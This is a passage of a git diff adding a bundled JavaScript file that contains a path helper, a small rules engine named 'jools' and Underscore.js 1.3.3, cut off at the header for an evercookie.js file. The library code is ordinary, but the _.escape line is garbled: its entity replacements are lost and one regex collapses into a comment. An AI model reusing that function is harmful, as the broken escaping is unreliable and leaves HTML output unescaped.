splitPathRe.exec(path)[2] || ''; + // TODO: make this comparison case-insensitive on windows? + if (ext && f.substr(-1 * ext.length) === ext) { + f = f.substr(0, f.length - ext.length); + } + return f; +}; + + +exports.extname = function(path) { + return splitPathRe.exec(path)[3] || ''; +}; + +}); + +require.define("/node_modules/jools/package.json", function (require, module, exports, __dirname, __filename) { +module.exports = {"main":"./lib/jools"} +}); + +require.define("/node_modules/jools/lib/jools.js", function (require, module, exports, __dirname, __filename) { +/** + * Module dependencies. + */ +var utils = require('./utils') + , _ = require('underscore'); + +/** + * version + */ +exports.version = '0.0.1'; + +/** + * Jools constructor. 
+ * + * A rule consists of: + * - Descriptive name + * - One or more conditions + * - One or more consequences, which are fired when all conditions evaluate to true. + * + * @param {Object} rules + */ +function Jools(rules) { + this.rules = rules; +} + +/** + * execute rules with fact + * + * @param {Object} fact + */ +Jools.prototype.execute = function (fact) { + var self = this + , session = _.clone(fact) + , last_session = _.clone(fact) + , goal = false; + + while (!goal) { + var changes = false; + for (var x=0; x < this.rules.length; x++) { + var rule = this.rules[x] + , outcome; + + _.flatten([rule.condition]).forEach(function (cnd) { + cnd.__args = cnd.__args || utils.paramNames(cnd); + + if (outcome) { + outcome = outcome && cnd.apply({}, utils.paramsToArguments(session, cnd.__args)); + } else { + outcome = cnd.apply({}, utils.paramsToArguments(session, cnd.__args)); + } + }); + if (outcome) { + _.flatten([rule.consequence]).forEach(function (csq) { + csq.__args = csq.__args || utils.paramNames(csq); + csq.apply(session, utils.paramsToArguments(fact, csq.__args)); + if (!_.isEqual(last_session,session)) { + // Fire all rules again! 
+ changes = true; + last_session = _.clone(session); + } + }); + } + if(changes) break; + } + if (!changes) goal = true; + } + return session; +}; + +module.exports = Jools; + + +}); + +require.define("/node_modules/jools/lib/utils.js", function (require, module, exports, __dirname, __filename) { +/** + * Returns an array of parameter names of the function f + * + * @param {Function} f + */ +module.exports.paramNames = function (f) { + var m = /function[^\(]*\(([^\)]*)\)/.exec(f.toString()); + if (!m) throw new TypeError("Invalid functions"); + + var params = []; + m[1].split(',').forEach(function (p) { + params.push(p.replace(/^\s*|\s*$/g, '')); + }); + + return params; +}; + +/** + * Creates an array of arguments + * + * @param {Object} obj + * @param {Array} params + */ +module.exports.paramsToArguments = function (obj, params) { + var args = []; + params.forEach(function (p) { + args.push(obj[p]); + }); + return args; +} + + +}); + +require.define("/node_modules/underscore/package.json", function (require, module, exports, __dirname, __filename) { +module.exports = {"main":"underscore.js"} +}); + +require.define("/node_modules/underscore/underscore.js", function (require, module, exports, __dirname, __filename) { +// Underscore.js 1.3.3 +// (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc. +// Underscore is freely distributable under the MIT license. +// Portions of Underscore are inspired or borrowed from Prototype, +// Oliver Steele's Functional, and John Resig's Micro-Templating. +// For all details and documentation: +// http://documentcloud.github.com/underscore + +(function() { + + // Baseline setup + // -------------- + + // Establish the root object, `window` in the browser, or `global` on the server. + var root = this; + + // Save the previous value of the `_` variable. + var previousUnderscore = root._; + + // Establish the object that gets returned to break out of a loop iteration. 
+ var breaker = {}; + + // Save bytes in the minified (but not gzipped) version: + var ArrayProto = Array.prototype, ObjProto = Object.prototype, FuncProto = Function.prototype; + + // Create quick reference variables for speed access to core prototypes. + var slice = ArrayProto.slice, + unshift = ArrayProto.unshift, + toString = ObjProto.toString, + hasOwnProperty = ObjProto.hasOwnProperty; + + // All **ECMAScript 5** native function implementations that we hope to use + // are declared here. + var + nativeForEach = ArrayProto.forEach, + nativeMap = ArrayProto.map, + nativeReduce = ArrayProto.reduce, + nativeReduceRight = ArrayProto.reduceRight, + nativeFilter = ArrayProto.filter, + nativeEvery = ArrayProto.every, + nativeSome = ArrayProto.some, + nativeIndexOf = ArrayProto.indexOf, + nativeLastIndexOf = ArrayProto.lastIndexOf, + nativeIsArray = Array.isArray, + nativeKeys = Object.keys, + nativeBind = FuncProto.bind; + + // Create a safe reference to the Underscore object for use below. + var _ = function(obj) { return new wrapper(obj); }; + + // Export the Underscore object for **Node.js**, with + // backwards-compatibility for the old `require()` API. If we're in + // the browser, add `_` as a global object via a string identifier, + // for Closure Compiler "advanced" mode. + if (typeof exports !== 'undefined') { + if (typeof module !== 'undefined' && module.exports) { + exports = module.exports = _; + } + exports._ = _; + } else { + root['_'] = _; + } + + // Current version. + _.VERSION = '1.3.3'; + + // Collection Functions + // -------------------- + + // The cornerstone, an `each` implementation, aka `forEach`. + // Handles objects with the built-in `forEach`, arrays, and raw objects. + // Delegates to **ECMAScript 5**'s native `forEach` if available. 
+ var each = _.each = _.forEach = function(obj, iterator, context) { + if (obj == null) return; + if (nativeForEach && obj.forEach === nativeForEach) { + obj.forEach(iterator, context); + } else if (obj.length === +obj.length) { + for (var i = 0, l = obj.length; i < l; i++) { + if (i in obj && iterator.call(context, obj[i], i, obj) === breaker) return; + } + } else { + for (var key in obj) { + if (_.has(obj, key)) { + if (iterator.call(context, obj[key], key, obj) === breaker) return; + } + } + } + }; + + // Return the results of applying the iterator to each element. + // Delegates to **ECMAScript 5**'s native `map` if available. + _.map = _.collect = function(obj, iterator, context) { + var results = []; + if (obj == null) return results; + if (nativeMap && obj.map === nativeMap) return obj.map(iterator, context); + each(obj, function(value, index, list) { + results[results.length] = iterator.call(context, value, index, list); + }); + if (obj.length === +obj.length) results.length = obj.length; + return results; + }; + + // **Reduce** builds up a single result from a list of values, aka `inject`, + // or `foldl`. Delegates to **ECMAScript 5**'s native `reduce` if available. + _.reduce = _.foldl = _.inject = function(obj, iterator, memo, context) { + var initial = arguments.length > 2; + if (obj == null) obj = []; + if (nativeReduce && obj.reduce === nativeReduce) { + if (context) iterator = _.bind(iterator, context); + return initial ? obj.reduce(iterator, memo) : obj.reduce(iterator); + } + each(obj, function(value, index, list) { + if (!initial) { + memo = value; + initial = true; + } else { + memo = iterator.call(context, memo, value, index, list); + } + }); + if (!initial) throw new TypeError('Reduce of empty array with no initial value'); + return memo; + }; + + // The right-associative version of reduce, also known as `foldr`. + // Delegates to **ECMAScript 5**'s native `reduceRight` if available. 
+ _.reduceRight = _.foldr = function(obj, iterator, memo, context) { + var initial = arguments.length > 2; + if (obj == null) obj = []; + if (nativeReduceRight && obj.reduceRight === nativeReduceRight) { + if (context) iterator = _.bind(iterator, context); + return initial ? obj.reduceRight(iterator, memo) : obj.reduceRight(iterator); + } + var reversed = _.toArray(obj).reverse(); + if (context && !initial) iterator = _.bind(iterator, context); + return initial ? _.reduce(reversed, iterator, memo, context) : _.reduce(reversed, iterator); + }; + + // Return the first value which passes a truth test. Aliased as `detect`. + _.find = _.detect = function(obj, iterator, context) { + var result; + any(obj, function(value, index, list) { + if (iterator.call(context, value, index, list)) { + result = value; + return true; + } + }); + return result; + }; + + // Return all the elements that pass a truth test. + // Delegates to **ECMAScript 5**'s native `filter` if available. + // Aliased as `select`. + _.filter = _.select = function(obj, iterator, context) { + var results = []; + if (obj == null) return results; + if (nativeFilter && obj.filter === nativeFilter) return obj.filter(iterator, context); + each(obj, function(value, index, list) { + if (iterator.call(context, value, index, list)) results[results.length] = value; + }); + return results; + }; + + // Return all the elements for which a truth test fails. + _.reject = function(obj, iterator, context) { + var results = []; + if (obj == null) return results; + each(obj, function(value, index, list) { + if (!iterator.call(context, value, index, list)) results[results.length] = value; + }); + return results; + }; + + // Determine whether all of the elements match a truth test. + // Delegates to **ECMAScript 5**'s native `every` if available. + // Aliased as `all`. 
+ _.every = _.all = function(obj, iterator, context) { + var result = true; + if (obj == null) return result; + if (nativeEvery && obj.every === nativeEvery) return obj.every(iterator, context); + each(obj, function(value, index, list) { + if (!(result = result && iterator.call(context, value, index, list))) return breaker; + }); + return !!result; + }; + + // Determine if at least one element in the object matches a truth test. + // Delegates to **ECMAScript 5**'s native `some` if available. + // Aliased as `any`. + var any = _.some = _.any = function(obj, iterator, context) { + iterator || (iterator = _.identity); + var result = false; + if (obj == null) return result; + if (nativeSome && obj.some === nativeSome) return obj.some(iterator, context); + each(obj, function(value, index, list) { + if (result || (result = iterator.call(context, value, index, list))) return breaker; + }); + return !!result; + }; + + // Determine if a given value is included in the array or object using `===`. + // Aliased as `contains`. + _.include = _.contains = function(obj, target) { + var found = false; + if (obj == null) return found; + if (nativeIndexOf && obj.indexOf === nativeIndexOf) return obj.indexOf(target) != -1; + found = any(obj, function(value) { + return value === target; + }); + return found; + }; + + // Invoke a method (with arguments) on every item in a collection. + _.invoke = function(obj, method) { + var args = slice.call(arguments, 2); + return _.map(obj, function(value) { + return (_.isFunction(method) ? method || value : value[method]).apply(value, args); + }); + }; + + // Convenience version of a common use case of `map`: fetching a property. + _.pluck = function(obj, key) { + return _.map(obj, function(value){ return value[key]; }); + }; + + // Return the maximum element or (element-based computation). 
+ _.max = function(obj, iterator, context) { + if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.max.apply(Math, obj); + if (!iterator && _.isEmpty(obj)) return -Infinity; + var result = {computed : -Infinity}; + each(obj, function(value, index, list) { + var computed = iterator ? iterator.call(context, value, index, list) : value; + computed >= result.computed && (result = {value : value, computed : computed}); + }); + return result.value; + }; + + // Return the minimum element (or element-based computation). + _.min = function(obj, iterator, context) { + if (!iterator && _.isArray(obj) && obj[0] === +obj[0]) return Math.min.apply(Math, obj); + if (!iterator && _.isEmpty(obj)) return Infinity; + var result = {computed : Infinity}; + each(obj, function(value, index, list) { + var computed = iterator ? iterator.call(context, value, index, list) : value; + computed < result.computed && (result = {value : value, computed : computed}); + }); + return result.value; + }; + + // Shuffle an array. + _.shuffle = function(obj) { + var shuffled = [], rand; + each(obj, function(value, index, list) { + rand = Math.floor(Math.random() * (index + 1)); + shuffled[index] = shuffled[rand]; + shuffled[rand] = value; + }); + return shuffled; + }; + + // Sort the object's values by a criterion produced by an iterator. + _.sortBy = function(obj, val, context) { + var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; }; + return _.pluck(_.map(obj, function(value, index, list) { + return { + value : value, + criteria : iterator.call(context, value, index, list) + }; + }).sort(function(left, right) { + var a = left.criteria, b = right.criteria; + if (a === void 0) return 1; + if (b === void 0) return -1; + return a < b ? -1 : a > b ? 1 : 0; + }), 'value'); + }; + + // Groups the object's values by a criterion. Pass either a string attribute + // to group by, or a function that returns the criterion. 
+ _.groupBy = function(obj, val) { + var result = {}; + var iterator = _.isFunction(val) ? val : function(obj) { return obj[val]; }; + each(obj, function(value, index) { + var key = iterator(value, index); + (result[key] || (result[key] = [])).push(value); + }); + return result; + }; + + // Use a comparator function to figure out at what index an object should + // be inserted so as to maintain order. Uses binary search. + _.sortedIndex = function(array, obj, iterator) { + iterator || (iterator = _.identity); + var low = 0, high = array.length; + while (low < high) { + var mid = (low + high) >> 1; + iterator(array[mid]) < iterator(obj) ? low = mid + 1 : high = mid; + } + return low; + }; + + // Safely convert anything iterable into a real, live array. + _.toArray = function(obj) { + if (!obj) return []; + if (_.isArray(obj)) return slice.call(obj); + if (_.isArguments(obj)) return slice.call(obj); + if (obj.toArray && _.isFunction(obj.toArray)) return obj.toArray(); + return _.values(obj); + }; + + // Return the number of elements in an object. + _.size = function(obj) { + return _.isArray(obj) ? obj.length : _.keys(obj).length; + }; + + // Array Functions + // --------------- + + // Get the first element of an array. Passing **n** will return the first N + // values in the array. Aliased as `head` and `take`. The **guard** check + // allows it to work with `_.map`. + _.first = _.head = _.take = function(array, n, guard) { + return (n != null) && !guard ? slice.call(array, 0, n) : array[0]; + }; + + // Returns everything but the last entry of the array. Especcialy useful on + // the arguments object. Passing **n** will return all the values in + // the array, excluding the last N. The **guard** check allows it to work with + // `_.map`. + _.initial = function(array, n, guard) { + return slice.call(array, 0, array.length - ((n == null) || guard ? 1 : n)); + }; + + // Get the last element of an array. Passing **n** will return the last N + // values in the array. 
The **guard** check allows it to work with `_.map`. + _.last = function(array, n, guard) { + if ((n != null) && !guard) { + return slice.call(array, Math.max(array.length - n, 0)); + } else { + return array[array.length - 1]; + } + }; + + // Returns everything but the first entry of the array. Aliased as `tail`. + // Especially useful on the arguments object. Passing an **index** will return + // the rest of the values in the array from that index onward. The **guard** + // check allows it to work with `_.map`. + _.rest = _.tail = function(array, index, guard) { + return slice.call(array, (index == null) || guard ? 1 : index); + }; + + // Trim out all falsy values from an array. + _.compact = function(array) { + return _.filter(array, function(value){ return !!value; }); + }; + + // Return a completely flattened version of an array. + _.flatten = function(array, shallow) { + return _.reduce(array, function(memo, value) { + if (_.isArray(value)) return memo.concat(shallow ? value : _.flatten(value)); + memo[memo.length] = value; + return memo; + }, []); + }; + + // Return a version of the array that does not contain the specified value(s). + _.without = function(array) { + return _.difference(array, slice.call(arguments, 1)); + }; + + // Produce a duplicate-free version of the array. If the array has already + // been sorted, you have the option of using a faster algorithm. + // Aliased as `unique`. + _.uniq = _.unique = function(array, isSorted, iterator) { + var initial = iterator ? _.map(array, iterator) : array; + var results = []; + // The `isSorted` flag is irrelevant if the array only contains two elements. + if (array.length < 3) isSorted = true; + _.reduce(initial, function (memo, value, index) { + if (isSorted ? 
_.last(memo) !== value || !memo.length : !_.include(memo, value)) { + memo.push(value); + results.push(array[index]); + } + return memo; + }, []); + return results; + }; + + // Produce an array that contains the union: each distinct element from all of + // the passed-in arrays. + _.union = function() { + return _.uniq(_.flatten(arguments, true)); + }; + + // Produce an array that contains every item shared between all the + // passed-in arrays. (Aliased as "intersect" for back-compat.) + _.intersection = _.intersect = function(array) { + var rest = slice.call(arguments, 1); + return _.filter(_.uniq(array), function(item) { + return _.every(rest, function(other) { + return _.indexOf(other, item) >= 0; + }); + }); + }; + + // Take the difference between one array and a number of other arrays. + // Only the elements present in just the first array will remain. + _.difference = function(array) { + var rest = _.flatten(slice.call(arguments, 1), true); + return _.filter(array, function(value){ return !_.include(rest, value); }); + }; + + // Zip together multiple lists into a single array -- elements that share + // an index go together. + _.zip = function() { + var args = slice.call(arguments); + var length = _.max(_.pluck(args, 'length')); + var results = new Array(length); + for (var i = 0; i < length; i++) results[i] = _.pluck(args, "" + i); + return results; + }; + + // If the browser doesn't supply us with indexOf (I'm looking at you, **MSIE**), + // we need this function. Return the position of the first occurrence of an + // item in an array, or -1 if the item is not included in the array. + // Delegates to **ECMAScript 5**'s native `indexOf` if available. + // If the array is large and already in sort order, pass `true` + // for **isSorted** to use binary search. + _.indexOf = function(array, item, isSorted) { + if (array == null) return -1; + var i, l; + if (isSorted) { + i = _.sortedIndex(array, item); + return array[i] === item ? 
i : -1; + } + if (nativeIndexOf && array.indexOf === nativeIndexOf) return array.indexOf(item); + for (i = 0, l = array.length; i < l; i++) if (i in array && array[i] === item) return i; + return -1; + }; + + // Delegates to **ECMAScript 5**'s native `lastIndexOf` if available. + _.lastIndexOf = function(array, item) { + if (array == null) return -1; + if (nativeLastIndexOf && array.lastIndexOf === nativeLastIndexOf) return array.lastIndexOf(item); + var i = array.length; + while (i--) if (i in array && array[i] === item) return i; + return -1; + }; + + // Generate an integer Array containing an arithmetic progression. A port of + // the native Python `range()` function. See + // [the Python documentation](http://docs.python.org/library/functions.html#range). + _.range = function(start, stop, step) { + if (arguments.length <= 1) { + stop = start || 0; + start = 0; + } + step = arguments[2] || 1; + + var len = Math.max(Math.ceil((stop - start) / step), 0); + var idx = 0; + var range = new Array(len); + + while(idx < len) { + range[idx++] = start; + start += step; + } + + return range; + }; + + // Function (ahem) Functions + // ------------------ + + // Reusable constructor function for prototype setting. + var ctor = function(){}; + + // Create a function bound to a given object (assigning `this`, and arguments, + // optionally). Binding with arguments is also known as `curry`. + // Delegates to **ECMAScript 5**'s native `Function.bind` if available. + // We check for `func.bind` first, to fail fast when `func` is undefined. 
+ _.bind = function bind(func, context) { + var bound, args; + if (func.bind === nativeBind && nativeBind) return nativeBind.apply(func, slice.call(arguments, 1)); + if (!_.isFunction(func)) throw new TypeError; + args = slice.call(arguments, 2); + return bound = function() { + if (!(this instanceof bound)) return func.apply(context, args.concat(slice.call(arguments))); + ctor.prototype = func.prototype; + var self = new ctor; + var result = func.apply(self, args.concat(slice.call(arguments))); + if (Object(result) === result) return result; + return self; + }; + }; + + // Bind all of an object's methods to that object. Useful for ensuring that + // all callbacks defined on an object belong to it. + _.bindAll = function(obj) { + var funcs = slice.call(arguments, 1); + if (funcs.length == 0) funcs = _.functions(obj); + each(funcs, function(f) { obj[f] = _.bind(obj[f], obj); }); + return obj; + }; + + // Memoize an expensive function by storing its results. + _.memoize = function(func, hasher) { + var memo = {}; + hasher || (hasher = _.identity); + return function() { + var key = hasher.apply(this, arguments); + return _.has(memo, key) ? memo[key] : (memo[key] = func.apply(this, arguments)); + }; + }; + + // Delays a function for the given number of milliseconds, and then calls + // it with the arguments supplied. + _.delay = function(func, wait) { + var args = slice.call(arguments, 2); + return setTimeout(function(){ return func.apply(null, args); }, wait); + }; + + // Defers a function, scheduling it to run after the current call stack has + // cleared. + _.defer = function(func) { + return _.delay.apply(_, [func, 1].concat(slice.call(arguments, 1))); + }; + + // Returns a function, that, when invoked, will only be triggered at most once + // during a given window of time. 
+ _.throttle = function(func, wait) { + var context, args, timeout, throttling, more, result; + var whenDone = _.debounce(function(){ more = throttling = false; }, wait); + return function() { + context = this; args = arguments; + var later = function() { + timeout = null; + if (more) func.apply(context, args); + whenDone(); + }; + if (!timeout) timeout = setTimeout(later, wait); + if (throttling) { + more = true; + } else { + result = func.apply(context, args); + } + whenDone(); + throttling = true; + return result; + }; + }; + + // Returns a function, that, as long as it continues to be invoked, will not + // be triggered. The function will be called after it stops being called for + // N milliseconds. If `immediate` is passed, trigger the function on the + // leading edge, instead of the trailing. + _.debounce = function(func, wait, immediate) { + var timeout; + return function() { + var context = this, args = arguments; + var later = function() { + timeout = null; + if (!immediate) func.apply(context, args); + }; + if (immediate && !timeout) func.apply(context, args); + clearTimeout(timeout); + timeout = setTimeout(later, wait); + }; + }; + + // Returns a function that will be executed at most one time, no matter how + // often you call it. Useful for lazy initialization. + _.once = function(func) { + var ran = false, memo; + return function() { + if (ran) return memo; + ran = true; + return memo = func.apply(this, arguments); + }; + }; + + // Returns the first function passed as an argument to the second, + // allowing you to adjust arguments, run code before and after, and + // conditionally execute the original function. + _.wrap = function(func, wrapper) { + return function() { + var args = [func].concat(slice.call(arguments, 0)); + return wrapper.apply(this, args); + }; + }; + + // Returns a function that is the composition of a list of functions, each + // consuming the return value of the function that follows. 
+ _.compose = function() { + var funcs = arguments; + return function() { + var args = arguments; + for (var i = funcs.length - 1; i >= 0; i--) { + args = [funcs[i].apply(this, args)]; + } + return args[0]; + }; + }; + + // Returns a function that will only be executed after being called N times. + _.after = function(times, func) { + if (times <= 0) return func(); + return function() { + if (--times < 1) { return func.apply(this, arguments); } + }; + }; + + // Object Functions + // ---------------- + + // Retrieve the names of an object's properties. + // Delegates to **ECMAScript 5**'s native `Object.keys` + _.keys = nativeKeys || function(obj) { + if (obj !== Object(obj)) throw new TypeError('Invalid object'); + var keys = []; + for (var key in obj) if (_.has(obj, key)) keys[keys.length] = key; + return keys; + }; + + // Retrieve the values of an object's properties. + _.values = function(obj) { + return _.map(obj, _.identity); + }; + + // Return a sorted list of the function names available on the object. + // Aliased as `methods` + _.functions = _.methods = function(obj) { + var names = []; + for (var key in obj) { + if (_.isFunction(obj[key])) names.push(key); + } + return names.sort(); + }; + + // Extend a given object with all the properties in passed-in object(s). + _.extend = function(obj) { + each(slice.call(arguments, 1), function(source) { + for (var prop in source) { + obj[prop] = source[prop]; + } + }); + return obj; + }; + + // Return a copy of the object only containing the whitelisted properties. + _.pick = function(obj) { + var result = {}; + each(_.flatten(slice.call(arguments, 1)), function(key) { + if (key in obj) result[key] = obj[key]; + }); + return result; + }; + + // Fill in a given object with default properties. 
+ _.defaults = function(obj) { + each(slice.call(arguments, 1), function(source) { + for (var prop in source) { + if (obj[prop] == null) obj[prop] = source[prop]; + } + }); + return obj; + }; + + // Create a (shallow-cloned) duplicate of an object. + _.clone = function(obj) { + if (!_.isObject(obj)) return obj; + return _.isArray(obj) ? obj.slice() : _.extend({}, obj); + }; + + // Invokes interceptor with the obj, and then returns obj. + // The primary purpose of this method is to "tap into" a method chain, in + // order to perform operations on intermediate results within the chain. + _.tap = function(obj, interceptor) { + interceptor(obj); + return obj; + }; + + // Internal recursive comparison function. + function eq(a, b, stack) { + // Identical objects are equal. `0 === -0`, but they aren't identical. + // See the Harmony `egal` proposal: http://wiki.ecmascript.org/doku.php?id=harmony:egal. + if (a === b) return a !== 0 || 1 / a == 1 / b; + // A strict comparison is necessary because `null == undefined`. + if (a == null || b == null) return a === b; + // Unwrap any wrapped objects. + if (a._chain) a = a._wrapped; + if (b._chain) b = b._wrapped; + // Invoke a custom `isEqual` method if one is provided. + if (a.isEqual && _.isFunction(a.isEqual)) return a.isEqual(b); + if (b.isEqual && _.isFunction(b.isEqual)) return b.isEqual(a); + // Compare `[[Class]]` names. + var className = toString.call(a); + if (className != toString.call(b)) return false; + switch (className) { + // Strings, numbers, dates, and booleans are compared by value. + case '[object String]': + // Primitives and their corresponding object wrappers are equivalent; thus, `"5"` is + // equivalent to `new String("5")`. + return a == String(b); + case '[object Number]': + // `NaN`s are equivalent, but non-reflexive. An `egal` comparison is performed for + // other numeric values. + return a != +a ? b != +b : (a == 0 ? 
1 / a == 1 / b : a == +b); + case '[object Date]': + case '[object Boolean]': + // Coerce dates and booleans to numeric primitive values. Dates are compared by their + // millisecond representations. Note that invalid dates with millisecond representations + // of `NaN` are not equivalent. + return +a == +b; + // RegExps are compared by their source patterns and flags. + case '[object RegExp]': + return a.source == b.source && + a.global == b.global && + a.multiline == b.multiline && + a.ignoreCase == b.ignoreCase; + } + if (typeof a != 'object' || typeof b != 'object') return false; + // Assume equality for cyclic structures. The algorithm for detecting cyclic + // structures is adapted from ES 5.1 section 15.12.3, abstract operation `JO`. + var length = stack.length; + while (length--) { + // Linear search. Performance is inversely proportional to the number of + // unique nested structures. + if (stack[length] == a) return true; + } + // Add the first object to the stack of traversed objects. + stack.push(a); + var size = 0, result = true; + // Recursively compare objects and arrays. + if (className == '[object Array]') { + // Compare array lengths to determine if a deep comparison is necessary. + size = a.length; + result = size == b.length; + if (result) { + // Deep compare the contents, ignoring non-numeric properties. + while (size--) { + // Ensure commutative equality for sparse arrays. + if (!(result = size in a == size in b && eq(a[size], b[size], stack))) break; + } + } + } else { + // Objects with different constructors are not equivalent. + if ('constructor' in a != 'constructor' in b || a.constructor != b.constructor) return false; + // Deep compare objects. + for (var key in a) { + if (_.has(a, key)) { + // Count the expected number of properties. + size++; + // Deep compare each member. + if (!(result = _.has(b, key) && eq(a[key], b[key], stack))) break; + } + } + // Ensure that both objects contain the same number of properties. 
+ if (result) { + for (key in b) { + if (_.has(b, key) && !(size--)) break; + } + result = !size; + } + } + // Remove the first object from the stack of traversed objects. + stack.pop(); + return result; + } + + // Perform a deep comparison to check if two objects are equal. + _.isEqual = function(a, b) { + return eq(a, b, []); + }; + + // Is a given array, string, or object empty? + // An "empty" object has no enumerable own-properties. + _.isEmpty = function(obj) { + if (obj == null) return true; + if (_.isArray(obj) || _.isString(obj)) return obj.length === 0; + for (var key in obj) if (_.has(obj, key)) return false; + return true; + }; + + // Is a given value a DOM element? + _.isElement = function(obj) { + return !!(obj && obj.nodeType == 1); + }; + + // Is a given value an array? + // Delegates to ECMA5's native Array.isArray + _.isArray = nativeIsArray || function(obj) { + return toString.call(obj) == '[object Array]'; + }; + + // Is a given variable an object? + _.isObject = function(obj) { + return obj === Object(obj); + }; + + // Is a given variable an arguments object? + _.isArguments = function(obj) { + return toString.call(obj) == '[object Arguments]'; + }; + if (!_.isArguments(arguments)) { + _.isArguments = function(obj) { + return !!(obj && _.has(obj, 'callee')); + }; + } + + // Is a given value a function? + _.isFunction = function(obj) { + return toString.call(obj) == '[object Function]'; + }; + + // Is a given value a string? + _.isString = function(obj) { + return toString.call(obj) == '[object String]'; + }; + + // Is a given value a number? + _.isNumber = function(obj) { + return toString.call(obj) == '[object Number]'; + }; + + // Is a given object a finite number? + _.isFinite = function(obj) { + return _.isNumber(obj) && isFinite(obj); + }; + + // Is the given value `NaN`? + _.isNaN = function(obj) { + // `NaN` is the only value for which `===` is not reflexive. + return obj !== obj; + }; + + // Is a given value a boolean? 
+ _.isBoolean = function(obj) { + return obj === true || obj === false || toString.call(obj) == '[object Boolean]'; + }; + + // Is a given value a date? + _.isDate = function(obj) { + return toString.call(obj) == '[object Date]'; + }; + + // Is the given value a regular expression? + _.isRegExp = function(obj) { + return toString.call(obj) == '[object RegExp]'; + }; + + // Is a given value equal to null? + _.isNull = function(obj) { + return obj === null; + }; + + // Is a given variable undefined? + _.isUndefined = function(obj) { + return obj === void 0; + }; + + // Has own property? + _.has = function(obj, key) { + return hasOwnProperty.call(obj, key); + }; + + // Utility Functions + // ----------------- + + // Run Underscore.js in *noConflict* mode, returning the `_` variable to its + // previous owner. Returns a reference to the Underscore object. + _.noConflict = function() { + root._ = previousUnderscore; + return this; + }; + + // Keep the identity function around for default iterators. + _.identity = function(value) { + return value; + }; + + // Run a function **n** times. + _.times = function (n, iterator, context) { + for (var i = 0; i < n; i++) iterator.call(context, i); + }; + + // Escape a string for HTML interpolation. + _.escape = function(string) { + return (''+string).replace(/&/g, '&').replace(//g, '>').replace(/"/g, '"').replace(/'/g, ''').replace(/\//g,'/'); + }; + + // If the value of the named property is a function then invoke it; + // otherwise, return it. + _.result = function(object, property) { + if (object == null) return null; + var value = object[property]; + return _.isFunction(value) ? value.call(object) : value; + }; + + // Add your own custom functions to the Underscore object, ensuring that + // they're correctly added to the OOP wrapper as well. 
+ _.mixin = function(obj) { + each(_.functions(obj), function(name){ + addToWrapper(name, _[name] = obj[name]); + }); + }; + + // Generate a unique integer id (unique within the entire client session). + // Useful for temporary DOM ids. + var idCounter = 0; + _.uniqueId = function(prefix) { + var id = idCounter++; + return prefix ? prefix + id : id; + }; + + // By default, Underscore uses ERB-style template delimiters, change the + // following template settings to use alternative delimiters. + _.templateSettings = { + evaluate : /<%([\s\S]+?)%>/g, + interpolate : /<%=([\s\S]+?)%>/g, + escape : /<%-([\s\S]+?)%>/g + }; + + // When customizing `templateSettings`, if you don't want to define an + // interpolation, evaluation or escaping regex, we need one that is + // guaranteed not to match. + var noMatch = /.^/; + + // Certain characters need to be escaped so that they can be put into a + // string literal. + var escapes = { + '\\': '\\', + "'": "'", + 'r': '\r', + 'n': '\n', + 't': '\t', + 'u2028': '\u2028', + 'u2029': '\u2029' + }; + + for (var p in escapes) escapes[escapes[p]] = p; + var escaper = /\\|'|\r|\n|\t|\u2028|\u2029/g; + var unescaper = /\\(\\|'|r|n|t|u2028|u2029)/g; + + // Within an interpolation, evaluation, or escaping, remove HTML escaping + // that had been previously added. + var unescape = function(code) { + return code.replace(unescaper, function(match, escape) { + return escapes[escape]; + }); + }; + + // JavaScript micro-templating, similar to John Resig's implementation. + // Underscore templating handles arbitrary delimiters, preserves whitespace, + // and correctly escapes quotes within interpolated code. + _.template = function(text, data, settings) { + settings = _.defaults(settings || {}, _.templateSettings); + + // Compile the template source, taking care to escape characters that + // cannot be included in a string literal and then unescape them in code + // blocks. 
+ var source = "__p+='" + text + .replace(escaper, function(match) { + return '\\' + escapes[match]; + }) + .replace(settings.escape || noMatch, function(match, code) { + return "'+\n_.escape(" + unescape(code) + ")+\n'"; + }) + .replace(settings.interpolate || noMatch, function(match, code) { + return "'+\n(" + unescape(code) + ")+\n'"; + }) + .replace(settings.evaluate || noMatch, function(match, code) { + return "';\n" + unescape(code) + "\n;__p+='"; + }) + "';\n"; + + // If a variable is not specified, place data values in local scope. + if (!settings.variable) source = 'with(obj||{}){\n' + source + '}\n'; + + source = "var __p='';" + + "var print=function(){__p+=Array.prototype.join.call(arguments, '')};\n" + + source + "return __p;\n"; + + var render = new Function(settings.variable || 'obj', '_', source); + if (data) return render(data, _); + var template = function(data) { + return render.call(this, data, _); + }; + + // Provide the compiled function source as a convenience for build time + // precompilation. + template.source = 'function(' + (settings.variable || 'obj') + '){\n' + + source + '}'; + + return template; + }; + + // Add a "chain" function, which will delegate to the wrapper. + _.chain = function(obj) { + return _(obj).chain(); + }; + + // The OOP Wrapper + // --------------- + + // If Underscore is called as a function, it returns a wrapped object that + // can be used OO-style. This wrapper holds altered versions of all the + // underscore functions. Wrapped objects may be chained. + var wrapper = function(obj) { this._wrapped = obj; }; + + // Expose `wrapper.prototype` as `_.prototype` + _.prototype = wrapper.prototype; + + // Helper function to continue chaining intermediate results. + var result = function(obj, chain) { + return chain ? _(obj).chain() : obj; + }; + + // A method to easily add functions to the OOP wrapper. 
+ var addToWrapper = function(name, func) { + wrapper.prototype[name] = function() { + var args = slice.call(arguments); + unshift.call(args, this._wrapped); + return result(func.apply(_, args), this._chain); + }; + }; + + // Add all of the Underscore functions to the wrapper object. + _.mixin(_); + + // Add all mutator Array functions to the wrapper. + each(['pop', 'push', 'reverse', 'shift', 'sort', 'splice', 'unshift'], function(name) { + var method = ArrayProto[name]; + wrapper.prototype[name] = function() { + var wrapped = this._wrapped; + method.apply(wrapped, arguments); + var length = wrapped.length; + if ((name == 'shift' || name == 'splice') && length === 0) delete wrapped[0]; + return result(wrapped, this._chain); + }; + }); + + // Add all accessor Array functions to the wrapper. + each(['concat', 'join', 'slice'], function(name) { + var method = ArrayProto[name]; + wrapper.prototype[name] = function() { + return result(method.apply(this._wrapped, arguments), this._chain); + }; + }); + + // Start chaining a wrapped Underscore object. + wrapper.prototype.chain = function() { + this._chain = true; + return this; + }; + + // Extracts the result from a wrapped and chained object. + wrapper.prototype.value = function() { + return this._wrapped; + }; + +}).call(this); + +}); diff --git a/core/main/client/lib/evercookie.js b/core/main/client/lib/evercookie.js index 4eb1be6d6..f723f6a46 100644 --- a/core/main/client/lib/evercookie.js +++ 